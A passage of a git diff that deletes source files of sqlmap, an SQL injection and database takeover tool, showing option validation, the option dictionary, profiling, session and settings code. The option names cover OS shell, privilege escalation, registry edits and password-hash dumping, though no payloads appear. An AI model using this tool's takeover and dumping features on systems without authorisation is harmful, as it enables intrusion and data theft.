in range [0,100]" - raise SqlmapSyntaxException(errMsg) - - if conf.textOnly and conf.nullConnection: - errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.direct and conf.url: - errMsg = "option '-d' is incompatible with option '-u' ('--url')" - raise SqlmapSyntaxException(errMsg) - - if conf.identifyWaf and conf.skipWaf: - errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" - raise SqlmapSyntaxException(errMsg) - - if conf.titles and conf.nullConnection: - errMsg = "switch '--titles' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.dumpTable and conf.search: - errMsg = "switch '--dump' is incompatible with switch '--search'" - raise SqlmapSyntaxException(errMsg) - - if conf.data and conf.nullConnection: - errMsg = "option '--data' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.string and conf.nullConnection: - errMsg = "option '--string' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.notString and conf.nullConnection: - errMsg = "option '--not-string' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.noCast and conf.hexConvert: - errMsg = "switch '--no-cast' is incompatible with switch '--hex'" - raise SqlmapSyntaxException(errMsg) - - if conf.dumpAll and conf.search: - errMsg = "switch '--dump-all' is incompatible with switch '--search'" - raise SqlmapSyntaxException(errMsg) - - if conf.string and conf.notString: - errMsg = "option '--string' is incompatible with switch '--not-string'" - raise SqlmapSyntaxException(errMsg) - - if conf.regexp and conf.nullConnection: - errMsg = "option '--regexp' is incompatible with switch '--null-connection'" - raise SqlmapSyntaxException(errMsg) - - if conf.regexp: - try: - re.compile(conf.regexp) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) - raise SqlmapSyntaxException(errMsg) - - if conf.crawlExclude: - try: - re.compile(conf.crawlExclude) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) - raise SqlmapSyntaxException(errMsg) - - if conf.dumpTable and conf.dumpAll: - errMsg = "switch '--dump' is incompatible with switch '--dump-all'" - raise SqlmapSyntaxException(errMsg) - - if conf.predictOutput and (conf.threads > 1 or conf.optimize): - errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'" - raise SqlmapSyntaxException(errMsg) - - if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"): - errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS - raise SqlmapSyntaxException(errMsg) - - if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile, conf.sitemapUrl)): - errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'" - raise SqlmapSyntaxException(errMsg) - - if conf.crawlExclude and not conf.crawlDepth: - errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'" - raise SqlmapSyntaxException(errMsg) - - if conf.safePost and not conf.safeUrl: - errMsg = "option '--safe-post' requires usage of option '--safe-url'" - raise SqlmapSyntaxException(errMsg) - - if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)): - errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'" - raise SqlmapSyntaxException(errMsg) - - if conf.safeReqFile and any((conf.safeUrl, conf.safePost)): - errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'" - raise SqlmapSyntaxException(errMsg) - - if conf.csrfUrl and not conf.csrfToken: - errMsg = "option '--csrf-url' requires usage of option '--csrf-token'" - raise SqlmapSyntaxException(errMsg) - - if conf.csrfToken and conf.threads > 1: - errMsg = "option '--csrf-url' is incompatible with option '--threads'" - raise SqlmapSyntaxException(errMsg) - - if conf.requestFile and conf.url and conf.url != DUMMY_URL: - errMsg = "option '-r' is incompatible with option '-u' ('--url')" - raise SqlmapSyntaxException(errMsg) - - if conf.direct and conf.proxy: - errMsg = "option '-d' is incompatible with option '--proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.direct and conf.tor: - errMsg = "option '-d' is incompatible with switch '--tor'" - raise SqlmapSyntaxException(errMsg) - - if not conf.tech: - errMsg = "option '--technique' can't be empty" - raise SqlmapSyntaxException(errMsg) - - if conf.tor and conf.ignoreProxy: - errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.tor and conf.proxy: - errMsg = "switch '--tor' is incompatible with option '--proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.proxy and conf.proxyFile: - errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" - raise SqlmapSyntaxException(errMsg) - - if conf.checkTor and not any((conf.tor, conf.proxy)): - errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" - raise SqlmapSyntaxException(errMsg) - - if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): - errMsg = "value for option '--tor-port' must be in range 0-65535" - raise SqlmapSyntaxException(errMsg) - - if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): - errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True)) - raise SqlmapSyntaxException(errMsg) - - if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True): - errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) - raise SqlmapSyntaxException(errMsg) - - if conf.skip and conf.testParameter: - errMsg = "option '--skip' is incompatible with option '-p'" - raise SqlmapSyntaxException(errMsg) - - if conf.mobile and conf.agent: - errMsg = "switch '--mobile' is incompatible with option '--user-agent'" - raise SqlmapSyntaxException(errMsg) - - if conf.proxy and conf.ignoreProxy: - errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'" - raise SqlmapSyntaxException(errMsg) - - if conf.timeSec < 1: - errMsg = "value for option '--time-sec' must be a positive integer" - raise SqlmapSyntaxException(errMsg) - - if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): - errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)" - raise SqlmapSyntaxException(errMsg) - - if isinstance(conf.uCols, basestring): - if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): - errMsg = "value for option '--union-cols' must be a range with hyphon " - errMsg += "(e.g. 1-10) or integer value (e.g. 5)" - raise SqlmapSyntaxException(errMsg) - - if conf.dbmsCred and ':' not in conf.dbmsCred: - errMsg = "value for option '--dbms-cred' must be in " - errMsg += "format : (e.g. \"root:pass\")" - raise SqlmapSyntaxException(errMsg) - - if conf.charset: - _ = checkCharEncoding(conf.charset, False) - if _ is None: - errMsg = "unknown charset '%s'. Please visit " % conf.charset - errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE - errMsg += "supported charsets" - raise SqlmapSyntaxException(errMsg) - else: - conf.charset = _ - - if conf.loadCookies: - if not os.path.exists(conf.loadCookies): - errMsg = "cookies file '%s' does not exist" % conf.loadCookies - raise SqlmapFilePathException(errMsg) - -def _resolveCrossReferences(): - lib.core.threads.readInput = readInput - lib.core.common.getPageTemplate = getPageTemplate - lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage - lib.request.connect.setHTTPHandlers = _setHTTPHandlers - lib.utils.search.setHTTPHandlers = _setHTTPHandlers - lib.controller.checks.setVerbosity = setVerbosity - -def initOptions(inputOptions=AttribDict(), overrideOptions=False): - if IS_WIN: - coloramainit() - - _setConfAttributes() - _setKnowledgeBaseAttributes() - _mergeOptions(inputOptions, overrideOptions) - -def init(): - """ - Set attributes into both configuration and knowledge base singletons - based upon command line and configuration file options. - """ - - _useWizardInterface() - setVerbosity() - _saveConfig() - _setRequestFromFile() - _cleanupOptions() - _dirtyPatches() - _purgeOutput() - _checkDependencies() - _createTemporaryDirectory() - _basicOptionValidation() - _setProxyList() - _setTorProxySettings() - _setDNSServer() - _adjustLoggingFormatter() - _setMultipleTargets() - _setTamperingFunctions() - _setWafFunctions() - _setTrafficOutputFP() - _resolveCrossReferences() - _checkWebSocket() - - parseTargetUrl() - parseTargetDirect() - - if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)): - _setHTTPTimeout() - _setHTTPExtraHeaders() - _setHTTPCookies() - _setHTTPReferer() - _setHTTPHost() - _setHTTPUserAgent() - _setHTTPAuthentication() - _setHTTPHandlers() - _setDNSCache() - _setSocketPreConnect() - _setSafeVisit() - _doSearch() - _setBulkMultipleTargets() - _setSitemapTargets() - _checkTor() - _setCrawler() - _findPageForms() - _setDBMS() - _setTechnique() - - _setThreads() - _setOS() - _setWriteFile() - _setMetasploit() - _setDBMSAuthentication() - loadBoundaries() - loadPayloads() - _setPrefixSuffix() - update() - _loadQueries() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py deleted file mode 100644 index dd08bd74..00000000 --- a/lib/core/optiondict.py +++ /dev/null @@ -1,243 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -optDict = { - # Format: - # Family: { "parameter name": "parameter datatype" }, - # Or: - # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") }, - "Target": { - "direct": "string", - "url": "string", - "logFile": "string", - "bulkFile": "string", - "requestFile": "string", - "sessionFile": "string", - "googleDork": "string", - "configFile": "string", - "sitemapUrl": "string", - }, - - "Request": { - "method": "string", - "data": "string", - "paramDel": "string", - "cookie": "string", - "cookieDel": "string", - "loadCookies": "string", - "dropSetCookie": "boolean", - "agent": "string", - "randomAgent": "boolean", - "host": "string", - "referer": "string", - "headers": "string", - "authType": "string", - "authCred": "string", - "authFile": "string", - "proxy": "string", - "proxyCred": "string", - "proxyFile": "string", - "ignoreProxy": "boolean", - "tor": "boolean", - "torPort": "integer", - "torType": "string", - "checkTor": "boolean", - "delay": "float", - "timeout": "float", - "retries": "integer", - "rParam": "string", - "safeUrl": "string", - "safePost": "string", - "safeReqFile": "string", - "safeFreq": "integer", - "skipUrlEncode": "boolean", - "csrfToken": "string", - "csrfUrl": "string", - "forceSSL": "boolean", - "hpp": "boolean", - "evalCode": "string", - }, - - "Optimization": { - "optimize": "boolean", - "predictOutput": "boolean", - "keepAlive": "boolean", - "nullConnection": "boolean", - "threads": "integer", - }, - - "Injection": { - "testParameter": "string", - "skip": "string", - "skipStatic": "boolean", - "dbms": "string", - "dbmsCred": "string", - "os": "string", - "invalidBignum": "boolean", - "invalidLogical": "boolean", - "invalidString": "boolean", - "noCast": "boolean", - "noEscape": "boolean", - "prefix": "string", - "suffix": "string", - "tamper": "string", - }, - - "Detection": { - "level": "integer", - "risk": "integer", - "string": "string", - "notString": "string", - "regexp": "string", - "code": "integer", - "textOnly": "boolean", - "titles": "boolean", - }, - - "Techniques": { - "tech": "string", - "timeSec": "integer", - "uCols": "string", - "uChar": "string", - "uFrom": "string", - "dnsName": "string", - "secondOrder": "string", - }, - - "Fingerprint": { - "extensiveFp": "boolean", - }, - - "Enumeration": { - "getAll": "boolean", - "getBanner": ("boolean", "Banners"), - "getCurrentUser": ("boolean", "Users"), - "getCurrentDb": ("boolean", "Databases"), - "getHostname": "boolean", - "isDba": "boolean", - "getUsers": ("boolean", "Users"), - "getPasswordHashes": ("boolean", "Passwords"), - "getPrivileges": ("boolean", "Privileges"), - "getRoles": ("boolean", "Roles"), - "getDbs": ("boolean", "Databases"), - "getTables": ("boolean", "Tables"), - "getColumns": ("boolean", "Columns"), - "getSchema": "boolean", - "getCount": "boolean", - "dumpTable": "boolean", - "dumpAll": "boolean", - "search": "boolean", - "getComments": "boolean", - "db": "string", - "tbl": "string", - "col": "string", - "excludeCol": "string", - "dumpWhere": "string", - "user": "string", - "excludeSysDbs": "boolean", - "limitStart": "integer", - "limitStop": "integer", - "firstChar": "integer", - "lastChar": "integer", - "query": "string", - "sqlShell": "boolean", - "sqlFile": "string", - }, - - "Brute": { - "commonTables": "boolean", - "commonColumns": "boolean", - }, - - "User-defined function": { - "udfInject": "boolean", - "shLib": "string", - }, - - "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", - }, - - "Takeover": { - "osCmd": "string", - "osShell": "boolean", - "osPwn": "boolean", - "osSmb": "boolean", - "osBof": "boolean", - "privEsc": "boolean", - "msfPath": "string", - "tmpPath": "string", - }, - - "Windows": { - "regRead": "boolean", - "regAdd": "boolean", - "regDel": "boolean", - "regKey": "string", - "regVal": "string", - "regData": "string", - "regType": "string", - }, - - "General": { - #"xmlFile": "string", - "trafficFile": "string", - "batch": "boolean", - "charset": "string", - "crawlDepth": "integer", - "crawlExclude": "string", - "csvDel": "string", - "dumpFormat": "string", - "eta": "boolean", - "flushSession": "boolean", - "forms": "boolean", - "freshQueries": "boolean", - "hexConvert": "boolean", - "outputDir": "string", - "parseErrors": "boolean", - "pivotColumn": "string", - "saveConfig": "string", - "scope": "string", - "testFilter": "string", - "testSkip": "string", - "updateAll": "boolean", - }, - - "Miscellaneous": { - "alert": "string", - "answers": "string", - "beep": "boolean", - "cleanup": "boolean", - "dependencies": "boolean", - "disableColoring": "boolean", - "googlePage": "integer", - "mobile": "boolean", - "offline": "boolean", - "pageRank": "boolean", - "purgeOutput": "boolean", - "smart": "boolean", - "wizard": "boolean", - "verbose": "integer", - }, - "Hidden": { - "dummy": "boolean", - "disablePrecon": "boolean", - "binaryFields": "string", - "profile": "boolean", - "cpuThrottle": "integer", - "forceDns": "boolean", - "identifyWaf": "boolean", - "skipWaf": "boolean", - "ignore401": "boolean", - "smokeTest": "boolean", - "liveTest": "boolean", - "stopFail": "boolean", - "runCase": "string", - } - } diff --git a/lib/core/profiling.py b/lib/core/profiling.py deleted file mode 100644 index a748d1ba..00000000 --- a/lib/core/profiling.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import os -import cProfile - -from lib.core.common import getUnicode -from lib.core.data import logger -from lib.core.data import paths -from lib.core.settings import UNICODE_ENCODING - -def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): - """ - This will run the program and present profiling data in a nice looking graph - """ - - try: - from thirdparty.gprof2dot import gprof2dot - from thirdparty.xdot import xdot - import gobject - import gtk - import pydot - except ImportError, e: - errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING) - errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')" - logger.error(errMsg) - - return - - if profileOutputFile is None: - profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw") - - if dotOutputFile is None: - dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.dot") - - if imageOutputFile is None: - imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.png") - - if os.path.exists(profileOutputFile): - os.remove(profileOutputFile) - - if os.path.exists(dotOutputFile): - os.remove(dotOutputFile) - - if os.path.exists(imageOutputFile): - os.remove(imageOutputFile) - - infoMsg = "profiling the execution into file %s" % profileOutputFile - logger.info(infoMsg) - - # Start sqlmap main function and generate a raw profile file - cProfile.run("start()", profileOutputFile) - - infoMsg = "converting profile data into a dot file '%s'" % dotOutputFile - logger.info(infoMsg) - - # Create dot file by using extra/gprof2dot/gprof2dot.py - # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING) - parser = gprof2dot.PstatsParser(profileOutputFile) - profile = parser.parse() - profile.prune(0.5 / 100.0, 0.1 / 100.0) - dot = gprof2dot.DotWriter(dotFilePointer) - dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP) - dotFilePointer.close() - - infoMsg = "converting dot file into a graph image '%s'" % imageOutputFile - logger.info(infoMsg) - - # Create graph image (png) by using pydot (python-pydot) - # http://code.google.com/p/pydot/ - pydotGraph = pydot.graph_from_dot_file(dotOutputFile) - pydotGraph.write_png(imageOutputFile) - - infoMsg = "displaying interactive graph with xdot library" - logger.info(infoMsg) - - # Display interactive Graphviz dot file by using extra/xdot/xdot.py - # http://code.google.com/p/jrfonseca/wiki/XDot - win = xdot.DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter("dot") - win.open_file(dotOutputFile) - gtk.main() diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py deleted file mode 100644 index fe52ee1c..00000000 --- a/lib/core/readlineng.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from lib.core.settings import IS_WIN -from lib.core.settings import PLATFORM - -_readline = None - -try: - from readline import * - import readline as _readline -except ImportError: - try: - from pyreadline import * - import pyreadline as _readline - except ImportError: - pass - -if IS_WIN and _readline: - try: - _outputfile = _readline.GetOutputFile() - except AttributeError: - debugMsg = "Failed GetOutputFile when using platform's " - debugMsg += "readline library" - logger.debug(debugMsg) - - _readline = None - -# Test to see if libedit is being used instead of GNU readline. -# Thanks to Boyd Waters for this patch. -uses_libedit = False - -if PLATFORM == 'mac' and _readline: - import commands - - (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__) - - if status == 0 and len(result) > 0: - # We are bound to libedit - new in Leopard - _readline.parse_and_bind("bind ^I rl_complete") - - debugMsg = "Leopard libedit detected when using platform's " - debugMsg += "readline library" - logger.debug(debugMsg) - - uses_libedit = True - -# the clear_history() function was only introduced in Python 2.4 and is -# actually optional in the readline API, so we must explicitly check for its -# existence. Some known platforms actually don't have it. This thread: -# http://mail.python.org/pipermail/python-dev/2003-August/037845.html -# has the original discussion. -if _readline: - try: - _readline.clear_history() - except AttributeError: - def clear_history(): - pass - - _readline.clear_history = clear_history diff --git a/lib/core/replication.py b/lib/core/replication.py deleted file mode 100644 index 92c591aa..00000000 --- a/lib/core/replication.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sqlite3 - -from extra.safe2bin.safe2bin import safechardecode -from lib.core.common import getSafeExString -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapValueException -from lib.core.settings import UNICODE_ENCODING - -class Replication(object): - """ - This class holds all methods/classes used for database - replication purposes. - """ - - def __init__(self, dbpath): - self.dbpath = dbpath - self.connection = sqlite3.connect(dbpath) - self.connection.isolation_level = None - self.cursor = self.connection.cursor() - - class DataType: - """ - Using this class we define auxiliary objects - used for representing sqlite data types. - """ - - def __init__(self, name): - self.name = name - - def __str__(self): - return self.name - - def __repr__(self): - return "" % self - - class Table: - """ - This class defines methods used to manipulate table objects. - """ - - def __init__(self, parent, name, columns=None, create=True, typeless=False): - self.parent = parent - self.name = unsafeSQLIdentificatorNaming(name) - self.columns = columns - if create: - try: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) - except Exception, ex: - errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) - errMsg += "located at '%s'" % self.parent.dbpath - raise SqlmapGenericException(errMsg) - - def insert(self, values): - """ - This function is used for inserting row(s) into current table. - """ - - if len(values) == len(self.columns): - self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?'] * len(values))), safechardecode(values)) - else: - errMsg = "wrong number of columns used in replicating insert" - raise SqlmapValueException(errMsg) - - def execute(self, sql, parameters=[]): - try: - self.parent.cursor.execute(sql, parameters) - except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) - errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath - errMsg += "it's not used by some other program" - raise SqlmapGenericException(errMsg) - - def beginTransaction(self): - """ - Great speed improvement can be gained by using explicit transactions around multiple inserts. - Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows - """ - self.execute('BEGIN TRANSACTION') - - def endTransaction(self): - self.execute('END TRANSACTION') - - def select(self, condition=None): - """ - This function is used for selecting row(s) from current table. - """ - _ = 'SELECT * FROM %s' % self.name - if condition: - _ += 'WHERE %s' % condition - return self.execute(_) - - def createTable(self, tblname, columns=None, typeless=False): - """ - This function creates Table instance with current connection settings. - """ - return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless) - - def __del__(self): - self.cursor.close() - self.connection.close() - - # sqlite data types - NULL = DataType('NULL') - INTEGER = DataType('INTEGER') - REAL = DataType('REAL') - TEXT = DataType('TEXT') - BLOB = DataType('BLOB') diff --git a/lib/core/revision.py b/lib/core/revision.py deleted file mode 100644 index 9f53f4bd..00000000 --- a/lib/core/revision.py +++ /dev/null @@ -1,54 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from subprocess import PIPE -from subprocess import Popen as execute - -def getRevisionNumber(): - """ - Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" - """ - - retVal = None - filePath = None - _ = os.path.dirname(__file__) - - while True: - filePath = os.path.join(_, ".git", "HEAD") - if os.path.exists(filePath): - break - else: - filePath = None - if _ == os.path.dirname(_): - break - else: - _ = os.path.dirname(_) - - while True: - if filePath and os.path.isfile(filePath): - with open(filePath, "r") as f: - content = f.read() - filePath = None - if content.startswith("ref: "): - filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip() - else: - match = re.match(r"(?i)[0-9a-f]{32}", content) - retVal = match.group(0) if match else None - break - else: - break - - if not retVal: - process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) - stdout, _ = process.communicate() - match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") - retVal = match.group(0) if match else None - - return retVal[:7] if retVal else None diff --git a/lib/core/session.py b/lib/core/session.py deleted file mode 100644 index 799342bc..00000000 --- a/lib/core/session.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import hashDBWrite -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import OS -from lib.core.settings import SUPPORTED_DBMS - -def setDbms(dbms): - """ - @param dbms: database management system to be set into the knowledge - base as fingerprint. - @type dbms: C{str} - """ - - hashDBWrite(HASHDB_KEYS.DBMS, dbms) - - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) - - if _: - dbms = _.group(1) - - Backend.setDbms(dbms) - - logger.info("the back-end DBMS is %s" % Backend.getDbms()) - -def setOs(): - """ - Example of kb.bannerFp dictionary: - - { - 'sp': set(['Service Pack 4']), - 'dbmsVersion': '8.00.194', - 'dbmsServicePack': '0', - 'distrib': set(['2000']), - 'dbmsRelease': '2000', - 'type': set(['Windows']) - } - """ - - infoMsg = "" - - if not kb.bannerFp: - return - - if "type" in kb.bannerFp: - Backend.setOs(Format.humanize(kb.bannerFp["type"])) - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - - if "distrib" in kb.bannerFp: - kb.osVersion = Format.humanize(kb.bannerFp["distrib"]) - infoMsg += " %s" % kb.osVersion - - if "sp" in kb.bannerFp: - kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", "")) - - elif "sp" not in kb.bannerFp and Backend.isOs(OS.WINDOWS): - kb.osSP = 0 - - if Backend.getOs() and kb.osVersion and kb.osSP: - infoMsg += " Service Pack %d" % kb.osSP - - if infoMsg: - logger.info(infoMsg) - - hashDBWrite(HASHDB_KEYS.OS, Backend.getOs()) diff --git a/lib/core/settings.py b/lib/core/settings.py deleted file mode 100644 index 69ca1460..00000000 --- a/lib/core/settings.py +++ /dev/null @@ -1,714 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import subprocess -import string -import sys -import time -import types - -from lib.core.datatype import AttribDict -from lib.core.enums import DBMS -from lib.core.enums import DBMS_DIRECTORY_NAME -from lib.core.enums import OS -from lib.core.revision import getRevisionNumber - -# sqlmap version and site -VERSION = "1.0.0.21" -REVISION = getRevisionNumber() -STABLE = VERSION.count('.') <= 2 -VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev") -DESCRIPTION = "automatic SQL injection and database takeover tool" -SITE = "http://sqlmap.org" -ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" -GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" -GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" - -# colorful banner -BANNER = """\033[01;33m _ - ___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m -|_ -| . | | | .'| . | -|___|_ |_|_|_|_|__,| _| - |_| |_| \033[0m\033[4;37m%s\033[0m\n -""" % ((31 + hash(VERSION) % 6) if not STABLE else 30, VERSION_STRING.split('/')[-1], SITE) - -# Minimum distance of ratio from kb.matchRatio to result in True -DIFF_TOLERANCE = 0.05 -CONSTANT_RATIO = 0.9 - -# Ratio used in heuristic check for WAF/IDS/IPS protected targets -IDS_WAF_CHECK_RATIO = 0.5 - -# Timeout used in heuristic check for WAF/IDS/IPS protected targets -IDS_WAF_CHECK_TIMEOUT = 10 - -# Lower and upper values for match ratio in case of stable page -LOWER_RATIO_BOUND = 0.02 -UPPER_RATIO_BOUND = 0.98 - -# Markers for special cases when parameter values contain html encoded characters -PARAMETER_AMP_MARKER = "__AMP__" -PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__" -BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__" -PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__" -PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" -URI_QUESTION_MARKER = "__QUESTION_MARK__" -ASTERISK_MARKER = "__ASTERISK_MARK__" -REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" - -RANDOM_INTEGER_MARKER = "[RANDINT]" -RANDOM_STRING_MARKER = "[RANDSTR]" - -PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" -CHAR_INFERENCE_MARK = "%c" -PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" - -# Regular expression used for recognition of textual content-type -TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" - -# Regular expression used for recognition of generic permission messages -PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" - -# Regular expression used for recognition of generic maximum connection messages -MAX_CONNECTIONS_REGEX = r"max.+connections" - -# Regular expression used for extracting results from Google search -GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" - -# Regular expression used for extracting results from DuckDuckGo search -DUCKDUCKGO_REGEX = r'"u":"([^"]+)' - -# Regular expression used for extracting results from Disconnect Search -DISCONNECT_SEARCH_REGEX = r'

([^<]+)

' - -# Dummy user agent for search (if default one returns different results) -DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0" - -# Regular expression used for extracting content from "textual" tags -TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P[^<]+)" - -# Regular expression used for recognition of IP addresses -IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" - -# Regular expression used for recognition of generic "your ip has been blocked" messages -BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)" - -# Dumping characters used in GROUP_CONCAT MySQL technique -CONCAT_ROW_DELIMITER = ',' -CONCAT_VALUE_DELIMITER = '|' - -# Coefficient used for a time-based query delay checking (must be >= 7) -TIME_STDEV_COEFF = 7 - -# Minimum response time that can be even considered as delayed (not a complete requirement) -MIN_VALID_DELAYED_RESPONSE = 0.5 - -# Standard deviation after which a warning message should be displayed about connection lags -WARN_TIME_STDEV = 0.5 - -# Minimum length of usable union injected response (quick defense against substr fields) -UNION_MIN_RESPONSE_CHARS = 10 - -# Coefficient used for a union-based number of columns checking (must be >= 7) -UNION_STDEV_COEFF = 7 - -# Length of queue for candidates for time delay adjustment -TIME_DELAY_CANDIDATES = 3 - -# Default value for HTTP Accept header -HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" - -# Default value for HTTP Accept-Encoding header -HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" - -# Default 